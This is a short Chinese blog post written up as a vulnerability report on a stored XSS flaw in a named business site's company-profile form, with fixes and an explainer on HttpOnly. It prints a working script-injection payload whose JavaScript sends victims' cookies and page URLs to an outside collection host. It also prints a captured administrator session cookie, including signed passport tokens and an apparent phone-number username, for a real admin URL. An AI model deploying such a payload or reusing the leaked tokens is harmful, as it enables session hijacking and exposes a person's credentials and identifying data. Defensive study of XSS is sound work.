XSS跨站攻击示例
2016-06-01 by dongnan
漏洞描述
某个业务系统,进行安全测试,发现XSS
漏洞,信息如下。
- 危害等级: 高
- 漏洞详情: 在完善资料时插入恶意代码,获取管理员
cookie
(俗称 XSS)。 - 漏洞描述: 没有过滤恶意代码而导致跨站脚本攻击。
- 存在问题的URL:
https://qy.ywwd.net/user/qyzz
修复建议
- 过滤标签转义。
- 加密
cookie
信息并设置httponly
标志。
漏洞详细信息
资料填写时,在企业地址,企业简介,企业法人姓名中插入的代码如下
"><script src=" http://************"></script>
跨站连接URL
http://xss9.com//5aBzKE?1457784814
(function(){(new Image()).src=
'http://xss9.com/index.php?do=api&id=5aBzKE&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())
+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())
+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())
+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?
window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xss9.com/index.php?
do=keepsession&id=5aBzKE&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
台成功收到后台管理员 cookie
,在 cookie
中还是能清楚的看到账号。
Url:http://admin.qy.zzh.ywwd.net/?_c=kuozhan&_a=duanxinlog
Cookie:UUID=c5079720-775d-90cc-4418-56a5a1fb705c; Hm_lvt_d5397186e
uname=13260115331
51cba200d234857ce5d27ab=1456196189,1456710178,1457315679,1457509525
; PHPSESSID=7952f2d2bf5d37d4570de948307d96f8; TRADE_ADMIN_PASSPOR
T_MEMBER_LOCAL=uid%3D1%26uname%3D13260115331%26register_type%3D1%26
expire%3D1458098764%26timestamp%3D1457925964%26version%3D0.1%26sign
%3Dc845db0237cda05e6fd8627384ed640fe6c842f3; TRADE_ADMIN_PASSPORT_
MEMBER=uid%3D1%26uname%3D13260115331%26register_type%3D1%26expire%3
D1458267612%26timestamp%3D1458094812%26version%3D0.1%26sign%3D271e2
573d410d9dd059cfc1dbe32d99c3ba41f19; Hm_lpvt_d5397186e51cba200d234
857ce5d27ab=1457925374; s_src=; OFFLINE_ADMIN_PASSPORT_MEMBER=uid
%3D117%26uname%3D13260115331%26register_type%3D1%26expire%3D1458100
130%26timestamp%3D1457927330%
扩展
HttpOnly
如果 cookie
中设置了 HttpOnly
属性,那么通过js
脚本将无法读取到cookie
信息,
这样能有效的防止XSS攻击窃取cookie
内容,增加了cookie
的安全性。
XSS
XSS
全称 Cross SiteScript
跨站脚本攻击,是Web程序中常见的漏洞,XSS
属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。
其原理是攻击者向有XSS
漏洞的网站中加入恶意的HTML
代码,当其它用户浏览该网站时,这段HTML
代码会自动执行从而达到攻击的目的。
例如盗取用户 Cookie、重定向到其它网站等。